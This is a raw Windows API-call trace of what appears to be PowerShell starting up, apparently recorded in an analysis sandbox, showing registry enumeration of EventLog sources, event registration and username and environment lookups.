	[0809.618] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3a8 | out: phkResult=0x14d3a8*=0x0) returned 0x2
	[0809.618] RegOpenKeyExW (in: hKey=0x340, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3a8 | out: phkResult=0x14d3a8*=0x348) returned 0x0
	[0809.619] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3a8 | out: phkResult=0x14d3a8*=0x0) returned 0x2
	[0809.619] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3a8 | out: phkResult=0x14d3a8*=0x34c) returned 0x0
	[0809.619] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3a8 | out: phkResult=0x14d3a8*=0x0) returned 0x2
	[0809.619] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3a8 | out: phkResult=0x14d3a8*=0x350) returned 0x0
	[0809.619] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3a8 | out: phkResult=0x14d3a8*=0x0) returned 0x2
	[0809.619] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3a8 | out: phkResult=0x14d3a8*=0x354) returned 0x0
	[0809.619] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3a8 | out: phkResult=0x14d3a8*=0x0) returned 0x2
	[0809.619] RegOpenKeyExW (in: hKey=0x340, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3a8 | out: phkResult=0x14d3a8*=0x358) returned 0x0
	[0809.620] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3a8 | out: phkResult=0x14d3a8*=0x0) returned 0x2
	[0809.620] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3a8 | out: phkResult=0x14d3a8*=0x35c) returned 0x0
	[0809.620] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3a8 | out: phkResult=0x14d3a8*=0x0) returned 0x2
	[0809.620] RegOpenKeyExW (in: hKey=0x340, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3a8 | out: phkResult=0x14d3a8*=0x360) returned 0x0
	[0809.620] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3a8 | out: phkResult=0x14d3a8*=0x0) returned 0x2
	[0809.620] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3a8 | out: phkResult=0x14d3a8*=0x364) returned 0x0
	[0809.620] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3a8 | out: phkResult=0x14d3a8*=0x368) returned 0x0
	[0809.620] RegCloseKey (hKey=0x368) returned 0x0
	[0809.621] RegCloseKey (hKey=0x340) returned 0x0
	[0809.621] RegCloseKey (hKey=0x364) returned 0x0
	[0809.622] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d348 | out: phkResult=0x14d348*=0x364) returned 0x0
	[0809.622] RegQueryInfoKeyW (in: hKey=0x364, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14d2bc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d2b8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14d2bc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d2b8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0809.622] CoTaskMemFree (pv=0x0) 
	[0809.622] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0809.622] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x0, lpName=0x1d21e0, lpcchName=0x14d348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x14d348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0809.622] CoTaskMemFree (pv=0x1d21e0) 
	[0809.622] CoTaskMemFree (pv=0x0) 
	[0809.622] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0809.622] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x1, lpName=0x1d21e0, lpcchName=0x14d348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x14d348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0809.622] CoTaskMemFree (pv=0x1d21e0) 
	[0809.623] CoTaskMemFree (pv=0x0) 
	[0809.623] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0809.623] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x2, lpName=0x1d21e0, lpcchName=0x14d348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x14d348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0809.623] CoTaskMemFree (pv=0x1d21e0) 
	[0809.623] CoTaskMemFree (pv=0x0) 
	[0809.623] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0809.623] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x3, lpName=0x1d21e0, lpcchName=0x14d348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x14d348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0809.623] CoTaskMemFree (pv=0x1d21e0) 
	[0809.623] CoTaskMemFree (pv=0x0) 
	[0809.623] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0809.623] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x4, lpName=0x1d21e0, lpcchName=0x14d348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x14d348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0809.623] CoTaskMemFree (pv=0x1d21e0) 
	[0809.623] CoTaskMemFree (pv=0x0) 
	[0809.623] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0809.623] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x5, lpName=0x1d21e0, lpcchName=0x14d348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x14d348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0809.624] CoTaskMemFree (pv=0x1d21e0) 
	[0809.624] CoTaskMemFree (pv=0x0) 
	[0809.624] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0809.624] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x6, lpName=0x1d21e0, lpcchName=0x14d348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x14d348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0809.624] CoTaskMemFree (pv=0x1d21e0) 
	[0809.624] CoTaskMemFree (pv=0x0) 
	[0809.624] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0809.624] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x7, lpName=0x1d21e0, lpcchName=0x14d348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x14d348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0809.624] CoTaskMemFree (pv=0x1d21e0) 
	[0809.624] CoTaskMemFree (pv=0x0) 
	[0809.624] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0809.624] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x8, lpName=0x1d21e0, lpcchName=0x14d348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x14d348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0809.624] CoTaskMemFree (pv=0x1d21e0) 
	[0809.624] CoTaskMemFree (pv=0x0) 
	[0809.624] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3a8 | out: phkResult=0x14d3a8*=0x340) returned 0x0
	[0809.625] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3a8 | out: phkResult=0x14d3a8*=0x0) returned 0x2
	[0809.625] RegOpenKeyExW (in: hKey=0x364, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3a8 | out: phkResult=0x14d3a8*=0x368) returned 0x0
	[0809.625] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3a8 | out: phkResult=0x14d3a8*=0x0) returned 0x2
	[0809.625] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3a8 | out: phkResult=0x14d3a8*=0x36c) returned 0x0
	[0809.625] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3a8 | out: phkResult=0x14d3a8*=0x0) returned 0x2
	[0809.625] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3a8 | out: phkResult=0x14d3a8*=0x370) returned 0x0
	[0809.625] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3a8 | out: phkResult=0x14d3a8*=0x0) returned 0x2
	[0809.625] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3a8 | out: phkResult=0x14d3a8*=0x374) returned 0x0
	[0809.625] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3a8 | out: phkResult=0x14d3a8*=0x0) returned 0x2
	[0809.626] RegOpenKeyExW (in: hKey=0x364, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3a8 | out: phkResult=0x14d3a8*=0x378) returned 0x0
	[0809.626] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3a8 | out: phkResult=0x14d3a8*=0x0) returned 0x2
	[0809.626] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3a8 | out: phkResult=0x14d3a8*=0x37c) returned 0x0
	[0809.626] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3a8 | out: phkResult=0x14d3a8*=0x0) returned 0x2
	[0809.626] RegOpenKeyExW (in: hKey=0x364, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3a8 | out: phkResult=0x14d3a8*=0x380) returned 0x0
	[0809.626] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3a8 | out: phkResult=0x14d3a8*=0x0) returned 0x2
	[0809.626] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3a8 | out: phkResult=0x14d3a8*=0x384) returned 0x0
	[0809.626] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3a8 | out: phkResult=0x14d3a8*=0x388) returned 0x0
	[0809.627] RegCloseKey (hKey=0x388) returned 0x0
	[0809.627] RegCloseKey (hKey=0x364) returned 0x0
	[0809.627] RegCloseKey (hKey=0x384) returned 0x0
	[0809.628] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d318 | out: phkResult=0x14d318*=0x384) returned 0x0
	[0809.628] RegQueryInfoKeyW (in: hKey=0x384, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14d28c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d288, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14d28c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d288*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0809.628] CoTaskMemFree (pv=0x0) 
	[0809.628] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0809.628] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x0, lpName=0x1d21e0, lpcchName=0x14d318, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x14d318, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0809.628] CoTaskMemFree (pv=0x1d21e0) 
	[0809.629] CoTaskMemFree (pv=0x0) 
	[0809.629] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0809.629] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x1, lpName=0x1d21e0, lpcchName=0x14d318, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x14d318, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0809.629] CoTaskMemFree (pv=0x1d21e0) 
	[0809.629] CoTaskMemFree (pv=0x0) 
	[0809.629] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0809.629] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x2, lpName=0x1d21e0, lpcchName=0x14d318, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x14d318, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0809.629] CoTaskMemFree (pv=0x1d21e0) 
	[0809.629] CoTaskMemFree (pv=0x0) 
	[0809.629] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0809.629] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x3, lpName=0x1d21e0, lpcchName=0x14d318, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x14d318, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0809.629] CoTaskMemFree (pv=0x1d21e0) 
	[0809.629] CoTaskMemFree (pv=0x0) 
	[0809.629] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0809.629] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x4, lpName=0x1d21e0, lpcchName=0x14d318, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x14d318, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0809.630] CoTaskMemFree (pv=0x1d21e0) 
	[0809.630] CoTaskMemFree (pv=0x0) 
	[0809.630] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0809.630] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x5, lpName=0x1d21e0, lpcchName=0x14d318, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x14d318, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0809.630] CoTaskMemFree (pv=0x1d21e0) 
	[0809.630] CoTaskMemFree (pv=0x0) 
	[0809.630] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0809.630] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x6, lpName=0x1d21e0, lpcchName=0x14d318, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x14d318, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0809.630] CoTaskMemFree (pv=0x1d21e0) 
	[0809.631] CoTaskMemFree (pv=0x0) 
	[0809.631] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0809.631] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x7, lpName=0x1d21e0, lpcchName=0x14d318, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x14d318, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0809.631] CoTaskMemFree (pv=0x1d21e0) 
	[0809.631] CoTaskMemFree (pv=0x0) 
	[0809.631] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0809.631] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x8, lpName=0x1d21e0, lpcchName=0x14d318, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x14d318, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0809.631] CoTaskMemFree (pv=0x1d21e0) 
	[0809.631] CoTaskMemFree (pv=0x0) 
	[0809.631] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d378 | out: phkResult=0x14d378*=0x364) returned 0x0
	[0809.631] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d378 | out: phkResult=0x14d378*=0x0) returned 0x2
	[0809.631] RegOpenKeyExW (in: hKey=0x384, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d378 | out: phkResult=0x14d378*=0x388) returned 0x0
	[0809.632] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d378 | out: phkResult=0x14d378*=0x0) returned 0x2
	[0809.632] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d378 | out: phkResult=0x14d378*=0x38c) returned 0x0
	[0809.632] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d378 | out: phkResult=0x14d378*=0x0) returned 0x2
	[0809.632] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d378 | out: phkResult=0x14d378*=0x390) returned 0x0
	[0809.632] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d378 | out: phkResult=0x14d378*=0x0) returned 0x2
	[0809.632] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d378 | out: phkResult=0x14d378*=0x394) returned 0x0
	[0809.632] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d378 | out: phkResult=0x14d378*=0x0) returned 0x2
	[0809.632] RegOpenKeyExW (in: hKey=0x384, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d378 | out: phkResult=0x14d378*=0x398) returned 0x0
	[0809.632] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d378 | out: phkResult=0x14d378*=0x0) returned 0x2
	[0809.633] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d378 | out: phkResult=0x14d378*=0x39c) returned 0x0
	[0809.633] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d378 | out: phkResult=0x14d378*=0x0) returned 0x2
	[0809.633] RegOpenKeyExW (in: hKey=0x384, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d378 | out: phkResult=0x14d378*=0x3a0) returned 0x0
	[0809.633] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d378 | out: phkResult=0x14d378*=0x0) returned 0x2
	[0809.633] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d378 | out: phkResult=0x14d378*=0x3a4) returned 0x0
	[0809.633] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d378 | out: phkResult=0x14d378*=0x3a8) returned 0x0
	[0809.633] RegCloseKey (hKey=0x3a8) returned 0x0
	[0809.634] RegCloseKey (hKey=0x384) returned 0x0
	[0809.634] RegCloseKey (hKey=0x3a4) returned 0x0
	[0809.639] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x2880008
	[0810.539] ReportEventW (hEventLog=0x2880008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x357a2e0*="WSMan", lpRawData=0x357a050) returned 1
	[0810.541] CoTaskMemAlloc (cb=0x104) returned 0x24c1f0
	[0810.541] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0810.541] CoTaskMemFree (pv=0x24c1f0) 
	[0810.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0810.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0810.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0810.543] CoTaskMemAlloc (cb=0x804) returned 0x1ba6d740
	[0810.543] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1ba6d740, nSize=0x14d608 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d608) returned 0x1
	[0810.544] CoTaskMemFree (pv=0x1ba6d740) 
	[0810.544] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0810.544] GetUserNameW (in: lpBuffer=0x1d21e0, pcbBuffer=0x14d648 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d648) returned 1
	[0810.544] CoTaskMemFree (pv=0x1d21e0) 
	[0810.545] ReportEventW (hEventLog=0x2880008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x357f818*="Alias", lpRawData=0x357f5a8) returned 1
	[0810.546] CoTaskMemAlloc (cb=0x104) returned 0x24c1f0
	[0810.546] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0810.546] CoTaskMemFree (pv=0x24c1f0) 
	[0810.547] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0810.547] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0810.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0810.548] CoTaskMemAlloc (cb=0x804) returned 0x1ba6d740
	[0810.548] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1ba6d740, nSize=0x14d608 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d608) returned 0x1
	[0810.549] CoTaskMemFree (pv=0x1ba6d740) 
	[0810.549] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0810.549] GetUserNameW (in: lpBuffer=0x1d21e0, pcbBuffer=0x14d648 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d648) returned 1
	[0810.549] CoTaskMemFree (pv=0x1d21e0) 
	[0810.549] ReportEventW (hEventLog=0x2880008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3584e10*="Environment", lpRawData=0x3584ba0) returned 1
	[0810.554] CoTaskMemAlloc (cb=0x104) returned 0x24c1f0
	[0810.554] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0810.554] CoTaskMemFree (pv=0x24c1f0) 
	[0810.555] CoTaskMemAlloc (cb=0x104) returned 0x24c1f0
	[0810.555] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x24c1f0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0810.555] CoTaskMemFree (pv=0x24c1f0) 
	[0810.555] CoTaskMemAlloc (cb=0x104) returned 0x24c1f0
	[0810.555] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x24c1f0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0810.555] CoTaskMemFree (pv=0x24c1f0) 
	[0810.556] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x14d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0810.556] SetErrorMode (uMode=0x1) returned 0x1
